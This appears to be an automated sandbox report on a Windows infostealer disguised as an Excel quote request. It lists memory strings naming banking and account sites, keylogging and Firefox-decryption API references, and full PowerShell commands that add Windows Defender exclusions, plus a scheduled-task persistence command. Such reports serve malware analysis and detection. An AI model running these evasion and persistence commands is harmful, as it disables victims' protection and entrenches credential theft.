Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598640
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598421
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598093
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597984
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597875
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597765
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597546
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597328
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597218
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597109
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596890
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596671
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596558
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595997
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595875
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595765
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595656
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595524
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595420
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595297
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595174
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595047
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 594390

Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2759690053.00000000011D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2759975485.0000000001678000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: qovDEn.exe, 0000000B.00000002.1593872334.00000000011B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: qovDEn.exe, 0000000F.00000002.2768391341.0000000004751000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Code function: 10_2_06C39548 LdrInitializeThunk,LdrInitializeThunk,

10_2_06C39548

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qovDEn.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qovDEn.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qovDEn.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process created: C:\Users\user\AppData\Roaming\qovDEn.exe "C:\Users\user\AppData\Roaming\qovDEn.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
